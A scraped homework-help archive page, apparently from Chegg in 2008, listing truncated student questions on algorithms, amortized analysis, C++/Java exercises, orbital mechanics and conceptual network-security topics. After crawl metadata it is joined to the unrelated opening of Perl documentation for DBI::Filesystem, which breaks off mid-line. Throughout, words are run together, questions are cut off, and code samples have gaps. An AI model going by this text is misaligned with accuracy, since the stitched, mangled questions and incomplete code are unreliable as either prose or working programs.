diskstorage. The operations PUSH and POP are supported on single-word values. The stack we wish tosupport can grow to be much larger than can fit in memory, and thus most of it must bestored on disk. A simple, but inefficient, stack implementation keeps the entirestack on disk. We maintain in memory a stack pointer, which is the disk address of the topelement on the stack. If the pointer has value p, the top element is the (p mod m)th word onpage ⌊p/m⌋ of the disk, where m is the number of words per page. To implement the PUSH operation, we increment the stack pointer,read the appropriate page into memory from disk, copy the element to be pushed to theappropriate word on the page, and write the page back to disk. A POP operation is similar. Wedecrement the stack pointer, read in the appropriate page from disk, and return the top of thestack. We need not write back the page, since it was not modified. Because disk operations are relatively expensive, we count twocosts for any implementation: the total number of disk accesses and the total CPU time. Any diskaccess to a page of m words incurs charges of one disk access and Θ(m) CPU time. a. Asymptotically, what is the worst-case number of disk accessesfor n stack operations using this simple implementation? What is the CPU time for n stackoperations? (Express your answer in terms of m and n for this and subsequentparts.) Now consider a stack implementation in which we keep one page ofthe stack in memory. (We also maintain a small amount of memory to keep track of whichpage is currently in memory.) We can perform a stack operation only if the relevant diskpage resides in memory. If necessary, the page currently in memory can be written to thedisk and the new page read in from the disk to memory. If the relevant disk page is already inmemory, then no disk accesses are required. b. What is the worst-case number of disk accesses required for nPUSH operations? What is the CPU time? c. What is the worst-case number of disk accesses required for nstack operations? What is the CPU time? Suppose that we now implement the stack by keeping two pages inmemory (in addition to a small number of words for bookkeeping). d. Describe how to manage the stack pages so that the amortizednumber of disk accesses for any stack operation is O(1/m) and the amortized CPU time forany stack operation is O(1). • Show less0 answers - Anonymous askedWe have an array of arrays. Each arary is either empty (0elem... Show moreConsider the following data structure: We have an array of arrays. Each arary is either empty (0elements), or compeletely full (2^i elements for element i). Each array isindividually sorted, though there is no relationship between the elements ofdifferent arrays. To determine whether an element is in our data structure, weperform binary search on each array. To insert a new element into our stucture, we create a new Array[0]. If our structure has an empty array[0], replace it with our array. If ourstructure has a full array [0], merge it with our new element to create anarray[1]. Repeat until we find an empty array to hold our items. Example: Array[0] = [0] Array[1] = [ 2, 5] Array[2] = [3 , 6, 8, 12] Array[3] = empty Array[4] = [4, 7, 9, 16, 20, 21, 22, 24, 25, 30, 31, 32, 55, 56,57, 58] 6 is in our structure, because it is in array [2]. 30 is in ourstructure because it is in array[4]. 33 is not in our structure. If we decide to insert the element 1, we can not add it to array0,because it is full. We copy data items over, leaving [0] empty, but can notadd it to array[1]. We merge, and merge again with array [2], beforecreating a new array[3]. Our final structure, after adding 1, is: Array[0]: empty Array[1]: empty Array[2]: empty Array[3]: [0, 1, 2, 3, 5, 6, 8, 12] Array[4] = [4, 7, 9, 16, 20, 21, 22, 24, 25, 30, 31, 32, 55, 56,57, 58] Problem: Analyze this structure for the amortized cost of searchesand insertions. • Show less0 answers - Mas7ter askedW... Show more(DON'T have to do Everything if don't want iwill • Show less0 answers - Anonymous askedAn observation satellite is to beplaced into a circular equatorial orbit so that it moves in thesame... Show more An observation satellite is to beplaced into a circular equatorial orbit so that it moves in thesame direction as the earth's rotation. Using a synthetic apertureradar system the satellite will store data on surface barometricpressure, and other whether related parameters, as it fliesoverhead. These data will later be played back to a controllingearth station after each trip around the world. The orbit is to bedesigned so that the satellite is directly above the controllingearth station, which is located on the equator, on every 4 h. Thecontrolling earth station antenna is unable to operate below andelevation angle of 10o to the horizontal in anydirection. Taking the earth rotational period to be exactly 24 h,find the following quantities: a. The satellite isangular velocity in radians per seconds. b. The orbital period inhours. c. The orbital radius inkilometers. d. The orbital height inkilometers. e. The satellite's linearvelocity in meters per second. f. The time interval inminutes for which the controlling earth station can communicatewith the satellite on each pass.• Show less1 answer - Anonymous asked0 answers - Anonymous asked1 answer - Anonymous askedKruskals algorithm (choose best non-cycle edge) is better than Prim's (cho... Show morex. Kruskals algorithm (choose best non-cycle edge) is better than Prim's (choose best tree edge) when the graph has relatively few edges. 1 True 2 False3 Unknown What is the solution to the recurrence T(n) = T(n/2)+n, T(1) = 1 1 O(logn) 2 O(n) 3 O(nlogn) 4 O(n2) 5 O(2n) If a problem is not in P, it must be NP-complete. 1 True 2 False 3 Unknown 1Total time for heapify is: Ο (log2 n) Ο (n log n) Ο (n2 log n) Ο (log n)If an algorithm has a complexity of log 2 n + nlog 2 n + n. we could say that it has complexity O(n) O( n log2 n) O(3) O( log2 ( log2 n )) O ( log2 n)In RAM model instructions are executed One after another ParallelConcurrent Random In selection algorithm, because we eliminate a constant fraction of the array with each phase, we get the Convergent geometric series Divergent geometric series None of theseDue to left-complete nature of binary tree, heaps can be stored in Link listStructureArrayNone of above The worst-case search time for a sorted singly-linked list of n items is o O(1) o O(logn) o O(n) o O(nlogn)o O(n2) Consider the following pairs of functions 2 2 I . f(x) = x + 3x+7 g(x) = x + 10 II f(x) = x2 3 log(x) g(x) = x 4 8 III f(x) = x + log(3x +7) g(x) = (x2 +17x +3)2 Which of the pairs of functions f and g are asymptotic? ?? Only I ?? Only II ?? Both I and III ?? None of the above Execution of the following code fragment int Idx; for (Idx = 0; Idx < N; Idx++) { cout << A[Idx] << endl; } is best described as being ?? O(N) ) ?? O(N2 ?? O(log N) ?? O(N log N) If algorithm A has running time 7n2 + 2n + 3 and algorithm B has running time 2n2, then ?? Both have same asymptotic time complexity ?? A is asymptotically greater ?? B is asymptotically greater ?? None of others Which of the following sorting algorithms is stable? (i) Merge sort, (ii) Quick sort, (iii) Heap sort, (iv) Counting Sort. ?? Only i ?? Only ii ?? Both i and ii ?? Both iii and iv The appropriate big θ classification of the given function. f(n) = 4n2 + 97n + 1000 is ?? θ(n) ) ?? θ(2n ) ?? θ(n2 log n) ?? θ(n2 The following subroutine computes for a given number N. compute(N) { If (N==1) return 2 else return compute(N - 1) * compute(N - 1) } What category of algorithmic solutions best characterizes the approach taken in this subroutine (algorithm)? ?? Search and traversal ?? Divide-and-conquer ?? Greedy algorithm?? Dynamic Programming Let us say we have an algorithm that carries out N2 operations for an input of size N. Let us say that a computer takes 1 microsecond (1/1000000 second) to carry out one operation. How long does the algorithm run for an input of size 3000? ?? 90 seconds ?? 9 seconds ?? 0.9 seconds ?? 0.09 seconds Consider the following polynomial aknk+ak-1nk-1+………….a0 . What is the Big –O representation of the above polynomial? ?? O(kn) ?? O(nk) ?? O(nk+1) ?? None of the above1 answer - Anonymous asked1 answer - Anonymous askedA. Write the following C++ subroutines into assemblylanguage. The functionality of your code should... Show moreA. that calls each of these functions with proper inputs andverify their functionality. Consider in this program any parameterpassing mechanismsize) { for(int i = 0; i < size; ++i) { array[i] = toLower (array[i]); } cout<< array << endl;}• Show less------------------------------------------------------------------------------------------1 answer - Anonymous askedThe company off... Show moreWrite a program that calculates and prints the bill for acellular telephone company. The company offers two types of service: regular and premium. Itsrates vary depending on the type of service. The rates are computedas follows: Regular service: $10.00 plus first 50 minutes arefree. Charges for over 50 minutes are $.20 per minute. Premium service: $25.00 plus: a. For calls made between 6:00A.M. to 6:00 P.M., the first 75 minutes are free; charges for over75 minutes are $.10 per minute. b. For calls made between 6:00P.M. to 6:00 A.M., the first 100 minutes are free; charges for over100 minutes are $.05 per minute. Your program should prompt the user to enter an account number, aservice code (type char), and the number of minutes the service wasused. A service code of R or r means regular service.; a servicecode of P or p means premium service. Treat any other character asan error. Your program should output the account number, type ofservice, number of minutes the telephone service was used, and theamount due from the user. For the premium service, the customer may be using the serviceduring the day and the night. Therefore, to calculate the bill, youmust ask the user to input the number of minutes the service wasused during the day and the number of minutes the service was usedduring the night. Make sure to run this program a few times and test out each of thepaths.would u please include comments/steps, to understand whatsgoing on?Thanks a lot• Show less5 answers - Anonymous askedSyst... Show moreWhat would be therecurssive form of the following loop?• Show less public static void Loop(String word) { System.out.println(); int length = word.length(); for(int i=length; i>0; i--) { System.out.println(word.substring(0,i)); } }1 answer - Anonymous askedthrough which i convert or used my FL... Show more I give you full rating please tell me the software or uploadme through which i convert or used my FLASH OR USB as RAM. So thatsit my computer speed raised. Please tell it urgently,.......Thanks• Show less1 answer - Anonymous asked, assum... Show morea) List all the 4-subsequences contained in the following datasequence:< {1,3}{2}{2,3}{4}>, assuming no timeconstriaints.B) List all the 3-element subsequences contained in thedata sequence for part (a) (assuming that no timing constraints areimposed).C) List all the 4-subsequences contained in the data sequencefor part (a) (assuming that time constraints are flexible)D) List all the 3-element subsequences contained in the datasequence for part (a) ( assuming that timing constraints areflexible.• Show less0 answers - Anonymous asked(an example of which is shown... Show moreWrite a function that reads from asequential file called: ‘config.dat’ (an example of which is shown below). The function should read the file, one record at a time. Eachrecord has exactly 3 fields. The first field (call it: dType)contains the string: int, float or char. The second field (call it: dSize) contains an integer number. Thisinteger is equal to the number of elements in the third field. The third field (call it: dSeq) contains a dSize number of dTypeelements (e.g. 12 integers, as shown below). Define a class DataStorage with the following data members, int *iPtr; float *fPtr; char *cPtr; Each record will be stored in an object of the DataStorageclass. Create an array of objects of this class to store all the recordsin the file as shown below, DataStorage *dsPtr = new DataStorage[no_of_records] We note that the number of records in the file is unknown and needsto be determined. In any object two of the pointer data members will be initializedto zero and the third will point to a dynamically allocated array. For example, the data members of the object for record one willhave the following values, iPtr = new int[dSize]; fPtr = 0; cPtr = 0; Write a test program that demonstrates the functionality of yourcode. Sample file: Field I Field II Field III Record I int 12 1 9 1 8 1 6 3 4 3 9 7 0 Record II float 2 5.30 56.31 Record III char 6 h a y K o z Record IV float 3 5.55 22.41 10.11 Note: The solution should be general not only applicable to thegiven example. you should use classes and objects. fsteam and ifstream • Show less0 answers - Anonymous askedInput: A and n, where A isan n x n matrix that represents a bi... Show more Algoritm (Warshall)Transitive Closure Input: A and n, where A isan n x n matrix that represents a binary relation. Output: R, the n x nmatrix for the transitive closure of A. voidtransitiveClosure(boolean[][] A, int n, boolean[][] R) int i, j, k; Copy A into R. Set all main diagonal entries, r(ii), to true. for(k=1;k<=n;k++) for(i=1;i<=n;i++) for(j=1;j<=n;j++) r(ij)=r(ij)V( r(ik)^r(kj)); Example: Transitive closure of a relation For the relation A below, the transitive closure is R. A = 0 1 0 0 1 0 0 0 1 0 0 1 0 0 0 0 0 1 0 0 0 0 0 1 0 R = 1 1 1 1 1 0 1 1 1 0 0 1 1 1 0 0 1 1 1 0 0 1 1 1 1 Question: Use Algorithmabove to compute the transitive closure of the relation A given inthe example. Show the matrix after each pass of the outermost forloop.• Show less0 answers - Anonymous askedShow that A+, theirreflexive transitive closure of... Show more Computing TransitiveClosure by Matrix Operations Show that A+, theirreflexive transitive closure of the Boolean matrix A, can becomputed with one matrix multiplication if the (reflexive)transitive closure, A*, is known.• Show less0 answers - Anonymous askedGive a dynamic programming solution forthe subset sum problem. Analyze the astmptotic order of yours... Show more Give a dynamic programming solution forthe subset sum problem. Analyze the astmptotic order of yoursolution. Explain why this solution does not put the subset sumproblem in P.• Show less1 answer - Anonymous askedarray and its size, and returns the i... Show more Write a c++ function, smallest, that takes as parameters anint array and its size, and returns the index, ofthe first occurrences, of teh smallest element in the array. Also,write a program to test your function.• Show less1 answer - Anonymous askedShow that each of thefollowing decision problems is in NP. To do this, indicate what a"proposed solu... Show more Show that each of thefollowing decision problems is in NP. To do this, indicate what a"proposed solution" for a problem instance would be, and tell whatproperties would be checked to determine if a proposed solutionjustifies a yes answer to the problem. a. the bin packingproblem• Show less b. the Hamiltonian cycle problem c. the satisfiability problem1 answer - Anonymous askedSuppose algorithm A3 co... Show moreSuppose algoritms A1 andA2 have worst-case time bound p and q, respectively.• Show less Suppose algorithm A3 consists of applying A2 to the output of A1.(The input for A3 is the input for A1.) Give a worst-case time bound for A3.0 answers - Anonymous askedi am trying to train on histogram this histogram show dots if iwant to make those black dots to rect... Show morei am trying to train on histogram this histogram show dots if iwant to make those black dots to rectangles v how to makeit import java.awt.*; import java.awt.font.*; import java.awt.geom.*; import java.text.*; import java.util.*; import javax.swing.*; public class PlottingData extends JPanel { int[] xVals; int[] yVals; final int MIN = 0; final int MAX = 100; final int PAD = 25; public PlottingData() { xVals = new int[10]; yVals = new int[10]; for(inti=0;i<10;i++) { xVals[i]= i; yVals[i] = i*10; } } xInc = (double)(w- 2*PAD)/(xVals.length-1); double yInc = (double)(h- 2*PAD)/(MAX - MIN); //System.out.printf("xInc = %.1f yInc = %.1f%n", xInc,yInc); // Origin of graph: double x0 = PAD; double y0 = h-PAD; // Draw ordinate. g2.draw(newLine2D.Double(PAD, PAD, PAD, h-PAD)); // Draw tick marks. for(int j = MAX-MIN; j>= 0; j -= 20) { double y = y0 - j*yInc; g2.draw(new Line2D.Double(x0, y, x0-2, y)); } // Label ordinate. Font font =g2.getFont(); FontRenderContext frc =g2.getFontRenderContext(); LineMetrics lm =font.getLineMetrics("0", frc); float height =lm.getAscent() + lm.getDescent(); for(int j = 0; j <=MAX-MIN; j += 10) { String s = String.valueOf(j+MIN); float width = (float)font.getStringBounds(s, frc).getWidth(); float x = (PAD - width)/2; float y = (float)(y0 - j*yInc + lm.getDescent()); g2.drawString(s, x, y); } // Draw abcissa. g2.draw(newLine2D.Double(PAD, h-PAD, w-PAD, h-PAD)); // Draw tick marks. for(int j = 0; j <xVals.length; j++) { double x = PAD + j*xInc; g2.draw(new Line2D.Double(x, y0, x, y0+2.0)); } // Label abcissa withxVals. float sy = h - PAD +(PAD + height)/2 - lm.getDescent(); for(int j = 0; j <xVals.length; j++) { String s = String.valueOf(xVals[j]); float width = (float)font.getStringBounds(s, frc).getWidth(); float x = (float)(PAD + j*xInc - width/2); g2.drawString(s, x, sy); } // Plot data. g2.setPaint(Color.red); for(int j = 0; j <yVals.length; j++) { double x = x0 + j*xInc; double y = y0 - (yVals[j] - MIN)*yInc; g2.fill(new Ellipse2D.Double(x-1.5, y-1.5, 4, 4)); } } public static void main(String[] args) { JFrame f = newJFrame(); f.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); f.add(newPlottingData()); f.setSize(400,400); f.setLocation(200,200); f.setVisible(true); } } • Show less2 answers - Anonymous asked0 answers - Anonymous askedIam desperetly looking for Instructor Solutions Manual of"introduction to Data mining"... Show moreHi folks,By: Tan, Steinbach, KumarISBN 0-321-32136-7 Plshelp me out. Cheers!• Show less 0 answers - Anonymous asked1 answer - Anonymous asked0 answers - Anonymous askedthat adds a bool... Show moreFor the class Furniture below, create a class Chairthat is a subclass of Furniturethat adds a boolean to keep track ofwhether or not the chair is padded. Add a constructor that sets thethree member variables. This constructor must call the appropriateconstructor of the superclass Furniture. Partially override the toStringmethod: invoke the toStringmethod from Furniture, then add "chair-related" code to it soan instance is printed in this form: Living Room Chair ($89.99)*padded*//Furniture class class Furniture { publicFurniture() { } public StringtoString(int cents, String description) { String str = String.format("%s (%f )",description,1.0*cents/100); return str; } }• Show less0 answers - Gentleman asked0 answers - Gentleman asked0 answers - Gentleman asked0 answers - Gentleman asked0 answers -!Given the memory values below and a one-address machine with anaccumulator, what are the contents of the accumulator and memorylocation 10 after the following instructions are executed?• Show less Word 10 contains 10 Word 20 contains 20 Word 30 contains 30 Word 40 contains 40 Word 50 contains 50 Word 60 contains 40 Word 70 contains 30 Word 80 contains 20 Word 90 contains 10 All other word locations contain zeros. A. LOAD IMMEDIATE 15 B. STORE 30 C. LOAD INDIRECT 80 D. STORE INDIRECT 90 E. LOAD DIRECT 301 answer -!.Consider shifting and rotation operations on the number Y = 62(base 10). A. Express the number Y in binary and hexadecimal format. Express the answers for the following parts in both binary anddecimal formats. B. What number do you get with a right shift of Y of 1-bit? C. What number do you get when Y is shifted left 1-bit? D. Give the 2's complement of 62. Call it Z. E. What number do you get when you rotate Z right 1-bit? F. What number do you get when you shift Z left 1-bit? • Show less!Consider a computer with 8-bit memory. Suppose the last operationwas the addition of the two numbers 5 and 7 (both base 10). Whatwould be the value of the following flags? Assume that when a bitis set, it is equal to 1. Also assume that the flags register wasinitialized to all zeros.• Show less A. Carry B. Auxiliary carry C. Zero D. Overflow E. Sign F. Parity!Given the following expressions:• Show less A = 0110,1101,0010,1001 B = 1001,1011,1111,0110 C = 1001,0010,1101,0110 Calculate the following. A. A and B B. A and C C. A or B D. A or C. E. A exclusive or A1 answer - Anonymous askedImplement the Sparsematrix using the circular linked list withheader. You need to implement the fol... Show moreImplement the Sparsematrix using the circular linked list withheader. You need to implement the following functions: (1)>>, << assuming the input format (2) transpose: thistransposes the matrix (3) destructor (4) add: return anothermatrix. • Show less0 answers - Anonymous asked1 answer - Anonymous askedWrite a C++ program to store up to 5 testgrades for each of up to 5 courses. You should use atwo-dem... Show moreWrite a C++ program to store up to 5 testgrades for each of up to 5 courses. You should use atwo-demensional array to achieve this task. Each row shouldrepresent the test grades for a given class. Use an extracolumn to store your test grade average ( as a decimal) for a givenclass. Show these results. It should ask the user howmany classes and grades they. Show theseresults. It should ask the user how many courses and gradesthey. It shouldask the user how many classes and grades they want. Show theseresults. • Show less1 answer - Anonymous asked1.) Assume that we employ a cryptosystem where the message Xis... Show moreNeed Solution for following problem.1.) Assume that we employ a cryptosystem where the message Xis hashed and the hashed result Y, is then concatenated with X andencrypted with a block cipher such that ek (X,Y) is sentover the open channel. Discuss which security services thiscryptosystem provides. What services are not provided?Please send solution as soon as possible.Thank you• Show less2 answers - Anonymous asked1.) Network is typically constructed into layers, wh... Show morePlease send solution for the following question1.) Network is typically constructed into layers, where thesecurity mechanisms can be deployed. Please provide the majoradvantages and drawbacks of installing security mechanisms at thelayers:i.) Application Layerii.)Transportation Layeriii.)Network Layeriv.) Data Link Layer.Also give atleast one security mechanism working at each ofthese five layers.Thank you• Show less1 answer - Anonymous asked1.) What is the problem of each of these attacks: (i.) D... Show morePlease send solution for following question1.) What is the problem of each of these attacks: (i.) Denialof Service, (ii.) IP Spoofing (iii.) Password Sniffing, and (iv.)Trojan Horse. For each attack, provide one mechanism to preventit.Thank you• Show less2 answers - Anonymous asked1.) Assume that every computer on the Internet is ful... Show morePlease send solution for followingQuestion.1.) Assume that every computer on the Internet is fullycapable to do IPSEC along with key management and securityassociation management. Will there be any vulnerability?Discuss.Thank you• Show less1 answer - Anonymous asked1.) Consider an authenticated RSA encryption system whe... Show morePlease send solution for following question.1.) Consider an authenticated RSA encryption system where thekey information is obtained via a Trusted Authority (TA). Assumethat in the set - up phase of the system, Oscar was capableof performing a successful man - in - the - middle attack. Showwhere must Oscar "inject" himself into the process to guaranteethat he can read (and alter) encrypted messages from Aliceto Bob and from Bob to Alice withoutAlice or Bob noticing. Justify your answerThank you• Show less1 answer - Anonymous asked0 answers - Anonymous askedWrite a program that prompts for a file name; the file containsseveral lines of arbitrary text strin... Show more Write a program that prompts for a file name; the file containsseveral lines of arbitrary text strings; the program prints eachline and prints the total number of characters in the line, thenumber of vowels, the number of alphabetic characters and thenumber of digit characters (separately), reporting each of thesecounts for each line. After the input file is read, the totalsof each of these is reported. · You may assume that each line contains 80 characters or less inlength. This includes all spaces and other characters readfrom the line, but not any terminating null character needed in anarray. So allocate an array just large enough to meet thisstandard. · Each line will be terminated with a carriage return-line feedcharacter pair, which should not be part of the line. · The program should exit with a complaint if there appears to bemore than 80 characters in any line. o Hint: consider reading the line with the single-characterfunction ifstream::get. (Look itup in the textbook index). Send the results to a chararray. o Use a loop to read each whole line. o Embed this in a suitable function, to make it easier to test itseparately. Note that you need to pass an openifstream object to the function byreference. · Your char array carrying one line should, of course, be terminatedwith a null character. o Your code will have to write this character when a line ending isfound – it will appear at various places in the array,depending on the line length. o When you pass the array to a function, you don't need to pass itslength – you can get that usingstrlen or by just looking for thenull character in a loop. · As usual, quit reading lines and issue your final report when theEOF is reached. · As usual, test the file open and file reading operations, and exitif there's an error. · A line may also be empty (just a CR-LF), and your program should beable to deal with that case. · After an array is read with your function, run a separate loop onthe array to do the counting and accumulation of the variouscharacters. o Note that in counting vowels, for example, you need twoaccumulators, one for that particular line, and another for thetotal in the file. o Embedding this operation in a function is highly recommended. o Create a struct or class to carry all the accumulators; this willavoid having to pass a lot of variables to your function byreference – pass the whole struct by reference instead.• Show less1 answer - Anonymous askedI want to detail solution of 16.3 3E example of Introductionto algorithm cormen book. This solut... Show moreHi,I want to detail solution of 16.3 3E example of Introductionto algorithm cormen book. This solution had some problemregarding in typing. So, I want detail solution.Thanks,• Show less1 answer
http://www.chegg.com/homework-help/questions-and-answers/computer-science-archive-2008-november-29
CC-MAIN-2014-23
refinedweb
5,015
58.08
#include <Python.h> #include <iostream> using namespace std; int main(int argc, char *argv[]) { Py_SetProgramName(argv[0]); /* optional but recommended */ Py_Initialize(); PyRun_SimpleString("from time import time,ctime\n" "print 'Today is',ctime(time())\n"); Py_Finalize(); int x = 0; cin >> x; system("PAUSE"); return 0; } Any idea what's going on here? Oddly, when I place that code that's supposed to pause it int x = 0; cin >> x; system("PAUSE"); in BEFORE all the python code, it does actually stop. Even worse: I've used breakpoints. If placed on or before the call to Py_Initialize(), the code stops at the breakpoint. Anywhere else, the breakpoint is never reached. Strangely, VC++ will usually tell you if a breakpoint will never be reached, however it seems to believe that the breakpoints placed after Py_Initialize() will be reached. UPDATE:: So apparently there's an error occuring. I barely noticed it. What happens is, a message is output "Import Error: No module named site." The program then closes immediately. Any ideas? I'm googling now, and I'll be back with another update if I find an answer, for future readers. Edited by Shaquil, 05 November 2012 - 09:33 PM.
http://www.gamedev.net/topic/633976-c-python-code-executes-and-closes-immediately/
CC-MAIN-2013-48
refinedweb
196
64.91
In this article, we will study what searching algorithms are and the types of searching algorithms i.e linear search and binary search in detail. We will learn their algorithm along with the python code and examples of the searching algorithms in detail. Lastly, we will understand the time complexity and application of the searching algorithm. So, let's get started! What is a searching algorithm? There is not even a single day when we don’t want to find something in our daily life. The same thing happens with the computer system. When the data is stored in it and after a certain amount of time the same data is to be retrieved by the user, the computer uses the searching algorithm to find the data. The system jumps into its memory, processes the search of data using the searching algorithm technique, and returns the data that the user requires. Therefore, the searching algorithm is the set of procedures used to locate the specific data from the collection of data. The searching algorithm is always considered to be the fundamental procedure of computing. And hence it is always said that the difference between the fast application and slower application is often decided by the searching algorithm used by the application. There are many types of searching algorithms possible like linear search, binary search, jump search, exponential search, Fibonacci search, etc. In this article, we will learn linear search and binary search in detail with algorithms, examples, and python code. What is Linear Search? Linear search is also known as a sequential searching algorithm to find the element within the collection of data. The algorithm begins from the first element of the list, starts checking every element until the expected element is found. If the element is not found in the list, the algorithm traverses the whole list and return “element not found”. Therefore, it is just a simple searching algorithm. Example: Consider the below array of elements. Now we have to find element a = 1 in the array given below. We will start with the first element of the array, compare the first element with the element to be found. If the match is not found, we will jump to the next element of the array and compare it with the element to be searched i.e ‘a’. If the element is found, we will return the index of that element else, we will return 'element not found'. Linear Search Algorithm LinearSearch(array, key) for each element in the array if element == value return its index Python Program for Linear Search def LinearSearch(array, n, k): for j in range(0, n): if (array[j] == k): return j return -1 array = [1, 3, 5, 7, 9] k = 7 n = len(array) result = LinearSearch(array, n, k) if(result == -1): print("Element not found") else: print("Element found at index: ", result) Output Element found at index: 3 Time Complexity of Linear Search The running time complexity of the linear search algorithm is O(n) for N number of elements in the list as the algorithm has to travel through each and every element to find the desired element. Applications of Linear Search - Used to find the desired element from the collection of data when the dataset is small - The searching operations is less than 100 items What is Binary Search? Binary search is used with a similar concept, i.e to find the element from the list of elements. Binary search algorithms are fast and effective in comparison to linear search algorithms. The most important thing to note about binary search is that it works only on sorted lists of elements. If the list is not sorted, then the algorithm first sorts the elements using the sorting algorithm and then runs the binary search function to find the desired output. There are two methods by which we can run the binary search algorithm i.e, iterative method or recursive method. The steps of the process are general for both the methods, the difference is only found in the function calling. Algorithm for Binary Search (Iterative Method) do until the pointers low and high are equal. mid = (low + high)/2 if (k == arr[mid]) return mid else if (k > arr[mid]) // k is on right side of mid low = mid + 1 else // k is on left side of mid high = mid - 1 Algorithm for Binary Search (Recursive Method) BinarySearch(array, k, low, high) if low > high return False else mid = (low + high) / 2 if k == array[mid] return mid else if k > array[mid] // k is on the right side return BinarySearch(array, k, mid + 1, high) else // k is on the right side return BinarySearch(array, k, low, mid - 1) Example Consider the following array on which the search is performed. Let the element to be found is k=0 Now, we will set two pointers pointing the low to the lowest position in the array and high to the highest position in the array. Now, we will find the middle element of the array using the algorithm and set the mid pointer to it. We will compare the mid element with the element to be searched and if it matches, we will return the mid element. If the element to be searched is greater than the mid, we will set the low pointer to the "mid+1" element and run the algorithm again. If the element to be searched is lower than the mid element, we will set the high pointer to the "mid-1" element and run the algorithm again. We will repeat the same steps until the low pointer meets the high pointer and we find the desired element. Python Code for Binary Search (Iterative Method) def binarySearch(arr, k, low, high): while low <= high: mid = low + (high - low)//2 if arr[mid] == k: return mid elif arr[mid] < k: low = mid + 1 else: high = mid - 1 return -1 arr = [1, 3, 5, 7, 9] k = 5 result = binarySearch(arr, k, 0, len(arr)-1) if result != -1: print("Element is present at index " + str(result)) else: print("Not found") Output Element is present at index 2 Python Code for Binary Search (Recursive Method) def BinarySearch(arr, k, low, high): if high >= low: mid = low + (high - low)//2 if arr[mid] == k: return mid elif arr[mid] > k: return BinarySearch(arr, k, low, mid-1) else: return BinarySearch(arr, k, mid + 1, high) else: return -1 arr = [1, 3, 5, 7, 9] k = 5 result = BinarySearch(arr, k, 0, len(arr)-1) if result != -1: print("Element is present at index " + str(result)) else: print("Not found") Output Element is present at index 2 Time complexity of Binary Search The running time complexity for binary search is different for each scenario. The best-case time complexity is O(1) which means the element is located at the mid-pointer. The Average and Worst-Case time complexity is O(log n) which means the element to be found is located either on the left side or on the right side of the mid pointer. Here, n indicates the number of elements in the list. The space complexity of the binary search algorithm is O(1). Applications of Binary Search - The binary search algorithm is used in the libraries of Java, C++, etc - It is used in another additional program like finding the smallest element or largest element in the array - It is used to implement a dictionary Difference Between Linear Search and Binary Search Conclusion As studied, linear and binary search algorithms have their own importance depending on the application. We often need to find the particular item of data amongst hundreds, thousands, and millions of data collection, and the linear and binary search will help with the same.
https://favtutor.com/blogs/searching-algorithms
CC-MAIN-2022-05
refinedweb
1,301
55.68
- NAME - SYNOPSIS - DESCRIPTION - HIGH LEVEL METHODS - $fs = DBI::Filesystem->new($dsn,{options...}) - $boolean = $fs->ignore_permissions([$boolean]); - $boolean = $fs->allow_magic_dirs([$boolean]); - $fs->mount($mountpoint, [\%fuseopts]) - $boolean = $fs->mounted([$boolean]) - Fuse hook functions - $inode = $fs->mknod($path,$mode,$rdev) - $inode = $fs->mkdir($path,$mode) - $fs->rename($oldname,$newname) - $fs->unlink($path) - $fs->rmdir($path) - $fs->link($oldpath,$newpath) - $fs->symlink($oldpath,$newpath) - $path = $fs->readlink($path) - @entries = $fs->getdir($path) - $boolean = $fs->isdir($path) - $fs->chown($path,$uid,$gid) - $fs->chmod($path,$mode) - @stat = $fs->fgetattr($path,$inode) - @stat = $fs->getattr($path) - $inode = $fs->open($path,$flags,$info) - $fh->release($inode) - $data = $fs->read($path,$length,$offset,$inode) - $bytes = $fs->write($path,$data,$offset,$inode) - $fs->flush( [$path,[$inode]] ) - $fs->truncate($path,$length) - $fs->ftruncate($path,$length,$inode) - $fs->utime($path,$atime,$mtime) - $fs->access($path,$access_mode) - $errno = $fs->errno($message) - $result = $fs->setxattr($path,$name,$val,$flags) - $val = $fs->getxattr($path,$name) - @attribute_names = $fs->listxattr($path) - $fs->removexattr($path,$name) - LOW LEVEL METHODS - $fs->initialize_schema - $ok = $fs->check_schema - $version = $fs->schema_version - $version = $fs->get_schema_version - $fs->set_schema_version($version) - $fs->check_schema_version - $fs->_update_schema_from_A_to_B - $count = $fs->flushblocks - $fixed_path = fixup($path) - $dsn = $fs->dsn - $dbh = $fs->dbh - $inode = $fs->create_inode($type,$mode,$rdev,$uid,$gid) - $id = $fs->last_inserted_inode($dbh) - $self->create_path($inode,$path) - $inode=$self->create_inode_and_path($path,$type,$mode,$rdev) - $fs->unlink_inode($inode) - $boolean = $fs->check_path($name,$inode,$uid,$gid) - $fs->check_perm($inode,$access_mode) - $fs->touch($inode,$field) - $inode = $fs->path2inode($path) - ($inode,$parent_inode,$name) = $self->path2inode($path) - @paths = $fs->inode2paths($inode) - $groups = $fs->get_groups($uid,$gid) - $ctx = $fs->get_context - SUBCLASSING - AUTHOR - LICENSE NAME DBI::Filesystem - Store a filesystem in a relational database SYNOPSIS use DBI::Filesystem; # Preliminaries. Create the mount point: mkdir '/tmp/mount'; # Create the databas: system "mysqladmin -uroot create test_filesystem"; system "mysql -uroot -e 'grant all privileges on test_filesystem.* to $ENV{USER}@localhost' mysql"; # (Usually you would do this in the shell.) # (You will probably need to add the admin user's password) # Create the filesystem object $fs = DBI::Filesystem->new('dbi:mysql:test_filesystem',{initialize=>1}); # Mount it on the mount point. # This call will block until the filesystem is mounted by another # process by calling "fusermount -u /tmp/mount" $fs->mount('/tmp/mount'); # Alternatively, manipulate the filesystem directly from within Perl. # Any of these methods could raise a fatal error, so always wrap in # an eval to catch those errors. eval { # directory creation $fs->create_directory('/dir1'); $fs->create_directory('/dir1/subdir_1a'); # file creation $fs->create_file('/dir1/subdir_1a/test.txt'); # file I/O $fs->write('/dir1/subdir_1a/test.txt','This is my favorite file',0); my $data = $fs->read('/dir1/subdir_1a/test.txt',100,0); # reading contents of a directory my @entries = $fs->getdir('/dir1'); # fstat file/directory my @stat = $fs->stat('/dir1/subdir_1a/test.txt'); #chmod/chown file $fs->chmod('/dir1/subdir_1a/test.txt',0600); $fs->chown('/dir1/subdir_1a/test.txt',1001,1001); #uid,gid # rename file/directory $fs->rename('/dir1'=>'/dir2'); # create a symbolic link $fs->symlink('/dir2' => '/dir1'); # create a hard link $fs->link('/dir2/subdir_1a/test.txt' => '/dir2/hardlink.txt'); # read symbolic link my $target = $fs->read_symlink('/dir1/symlink.txt'); # unlink a file $fs->unlink_file('/dir2/subdir_1a/test.txt'); # remove a directory $fs->remove_directory('/dir2/subdir_1a'); # get the inode (integer) that corresponds to a file/directory my $inode = $fs->path2inode('/dir2'); # get the 